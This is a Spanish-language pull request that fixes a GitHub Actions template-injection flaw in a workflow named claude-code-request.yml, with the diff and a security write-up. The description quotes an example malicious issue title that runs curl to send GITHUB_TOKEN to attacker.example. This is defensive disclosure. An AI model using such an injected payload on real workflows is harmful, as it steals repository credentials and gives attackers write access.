### PR TITLE
fix(security): template injection RCE en claude-code-request workflow

### DIFF
--- a/.github/workflows/claude-code-request.yml
+++ b/.github/workflows/claude-code-request.yml
@@ -21,10 +21,21 @@ permissions:
   pull-requests: write
   issues: write
 
+# Concurrency: serializar requests para el MISMO issue, no entre issues distintos.
+# Evita race condition cuando un labeling rápido (label + unlabel + label) crea
+# branches duplicados o intenta `git checkout -b` sobre branch ya existente.
+concurrency:
+  group: claude-code-request-${{ github.event.issue.number }}
+  cancel-in-progress: false
+
 jobs:
   bootstrap-branch:
     if: github.event.label.name == 'claude-code-request'
     runs-on: ubuntu-latest
+    # Cap defensivo: el job solo crea branch + draft PR + 1 curl. Debe terminar
+    # en <60s. 5min es suficiente buffer + evita runners colgados consumiendo
+    # minutos billables si gh CLI o Telegram API quedan suspendidos.
+    timeout-minutes: 5
     steps:
       - uses: actions/checkout@v4
         with:
@@ -91,12 +102,17 @@ jobs:
         id: pr
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          # SECURITY: bind issue title via env (NOT directly in run: shell).
+          # Interpolación de `${{ github.event.issue.title }}` directo en bash
+          # es template injection — un issue malicioso con `"; cmd #` ejecuta
+          # comandos arbitrarios con GITHUB_TOKEN. Bind a env y referenciar
+          # como "$VAR" es seguro (bash NO re-evalúa command substitution
+          # dentro de variables expandidas).
+          ISSUE_TITLE: ${{ github.event.issue.title }}
+          BRANCH: ${{ steps.parse.outputs.branch }}
+          ISSUE_NUM: ${{ steps.parse.outputs.issue_num }}
         run: |
-          PR_URL=$(gh pr create \
-            --base main \
-            --head "${{ steps.parse.outputs.branch }}" \
-            --title "[WIP] ${{ github.event.issue.title }}" \
-            --body "Closes #${{ steps.parse.outputs.issue_num }}
+          BODY="Closes #${ISSUE_NUM}
 
           **Draft PR generado automáticamente** por \`claude-code-request.yml\`. Pendiente de code-generation.
 
@@ -108,7 +124,12 @@ jobs:
 
           - Este PR **NO se mergea automáticamente** bajo ninguna condición.
           - El operador revisa diff manualmente tras CI verde.
-          - Si quiere auto-merge por nominación explícita, añadir label \`squash-on-merge\`." \
+          - Si quiere auto-merge por nominación explícita, añadir label \`squash-on-merge\`."
+          PR_URL=$(gh pr create \
+            --base main \
+            --head "$BRANCH" \
+            --title "[WIP] $ISSUE_TITLE" \
+            --body "$BODY" \
             --draft)
           echo "pr_url=$PR_URL" >> "$GITHUB_OUTPUT"
 


### PR DESCRIPTION
## Resumen

🔴 **Severidad: CRITICAL** — RCE explotable hoy en producción.

## Vulnerabilidad

\`.github/workflows/claude-code-request.yml\` línea 98 interpolaba \`\${{ github.event.issue.title }}\` directo en un \`run:\` block de bash. Un issue con título malicioso como:

\`\`\`
"; curl https://attacker.example/exfil?t=\$GITHUB_TOKEN #
\`\`\`

…se renderizaba literalmente en el comando shell del runner, ejecutando código arbitrario con \`secrets.GITHUB_TOKEN\` (que tiene \`contents: write\` + \`pull-requests: write\` + \`issues: write\`).

## Vector de ataque

En repo público AGPL-3.0, **cualquier usuario con permiso triage o superior puede agregar labels**. Un atacante que obtenga ese permiso (por ej. contributor approval, social engineering) puede:
1. Crear issue con payload en título.
2. Añadir label \`claude-code-request\`.
3. Workflow ejecuta payload con write access al repo.

## Fix

1. **Bind via \`env:\` antes de \`run:\`** — bash variable expansion (\`"\$VAR"\`) NO re-evalúa command substitution dentro del valor. GitHub Actions templating (\`\${{ }}\`) sí, porque hace string substitution literal antes de que bash vea el script.
2. **Hardening defensivo** (mismo PR):
   - \`timeout-minutes: 5\` — cap si gh/curl cuelgan.
   - \`concurrency\` group por issue — evita race en re-labeling rápido.

## Test plan

- [x] ESLint/yamllint clean.
- [ ] CodeQL CI debe pasar (no introducir nuevos hallazgos).
- [ ] Test funcional post-merge: crear issue con título normal + label \`claude-code-request\`, verificar que sigue creando branch + draft PR.

## Refs

Detectado durante audit pre-deploy 2026-04-26. Bajo el mismo patrón se debe revisar:
- \`.github/workflows/deploy.yml\`
- \`.github/workflows/codeql.yml\`
- \`.github/workflows/playwright.yml\`
- guatoc-nixos workflows